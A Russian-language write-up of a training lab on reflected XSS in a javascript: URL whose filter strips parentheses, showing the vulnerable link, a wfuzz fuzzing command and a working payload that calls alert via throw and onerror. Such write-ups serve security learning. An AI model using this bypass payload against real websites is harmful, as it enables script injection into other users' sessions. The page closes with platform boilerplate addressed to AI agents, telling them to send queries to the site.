> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/web/xss/xss-in-javascript-url-with-limited-characters.md).

# XSS в JavaScript-URL с ограниченным набором символов

### Отражённый XSS в JavaScript-URL с блокировкой некоторых символов

#### Цель

Используя уязвимость отражённого XSS в `JavaScript:` URL для вывода `alert` содержащий `1337` строку (она `1337` строка должна присутствовать где-то в сообщении).

Приложение отражает наш ввод в JavaScript-URL. На первый взгляд задача кажется простой, но приложение фильтрует некоторые символы, чтобы предотвратить XSS-атаки. Мы должны найти способ выйти из контекста JavaScript, несмотря на эти ограничения, и вызвать `alert(...)` содержащий `1337`.

<figure><img src="/files/ee456543ee4ffa8143c9c176be1f5b537c23a868" alt=""><figcaption></figcaption></figure>

#### Анализ наблюдаемого исходного кода

В исходном коде можно найти следующую ссылку:

{% code overflow="wrap" %}

```javascript
<a href="javascript:fetch('/analytics', {method:'post',body:'/post%3fpostId%3d1'}).finally(_ => window.location = '/')">Назад к блогу</a>
```

{% endcode %}

После декодирования URL получается:

{% code overflow="wrap" %}

```javascript
<a href="javascript:fetch('/analytics', {method:'post',body:'/post?postId=1'}).finally(_ => window.location = '/')">Назад к блогу</a>
```

{% endcode %}

При нажатии Back to Blog выполняется этот JavaScript-URL. Перехватив запрос, мы видим, что выполняется вызов к `/analytics`. `postId` параметр берётся из URL (`/post?postId=...`) и отражается в теле запроса analytics.

<figure><img src="/files/4479a59d20a84da203739e4b8027c1144a92ca09" alt=""><figcaption></figcaption></figure>

#### Первая попытка — поломка парсинга

<figure><img src="/files/83e0ae7b9d9e18bdf5a4ada577f998e5b6360172" alt="" width="563"><figcaption></figcaption></figure>

При внедрении одной апострофы парсинг ломается (ID становится недействительным):

```javascript
2'},{x:'
```

Апостроф ломает структуру, что показывает, что значение вставляется в контекст, где кавычки имеют значение.

<figure><img src="/files/575ac5de79a6db538fa737402ebf86aee6f235c2" alt="" width="563"><figcaption></figcaption></figure>

#### Фаззинг специальных символов

Мы быстро проверили, какие специальные символы дают корректный ответ (с `wfuzz` и `special-chars.txt` списком). Использованная команда-пример:

{% code overflow="wrap" %}

```bash
wfuzz -c -w /usr/share/SecLists/Fuzzing/special-chars.txt 'https://0a530041036b803fbb5cd40a009500a8.web-security-academy.net/post?postId=2FUZZ%27},{x:%27'
```

{% endcode %}

Результаты показывают, что `&` и `#` дают код 200 — они принимаются парсером и позволяют вставлять последовательности, которые корректно закрывают структуру.

<figure><img src="/files/14242ab5134c998730807bb91cf7ab07fd47d98e" alt="" width="563"><figcaption></figcaption></figure>

Наблюдаемая интерпретация:

```javascript
post?postId=2&
```

<figure><img src="/files/d2e624de44116cd35813bb2cf10b0d62084dbf96" alt=""><figcaption></figcaption></figure>

#### Построение вектора выхода

Правильно закрыв значение и вставив код, можно получить:

```javascript
post?postId=2&'},{x:''
```

<figure><img src="/files/4635f72bb5d97f9b4c6817f6b09f21af8cda251e" alt=""><figcaption></figcaption></figure>

Здесь `x` остаётся пустым, и синтаксис принимается.

Затем мы пытаемся добавить `alert` напрямую:

```javascript
post?postId=2&'},alert(1),{x:''
```

Но `()` скобки из `alert(1)` удаляются фильтром — поэтому нужно обойти требование использовать `()`.

<figure><img src="/files/b5c0aeca83988708fb8d6651e143358bdb8d3339" alt=""><figcaption></figcaption></figure>

#### Обход без круглых скобок

Можно обойтись без круглых скобок и использовать более креативные JavaScript-выражения для вызова `alert` на `1337` в выводе. Используемый итоговый payload:

```javascript
2&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window%2b'',{x:'
```

<figure><img src="/files/04e0857f98007b09e3c279a54dd731ad856fdf08" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/web/xss/xss-in-javascript-url-with-limited-characters.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
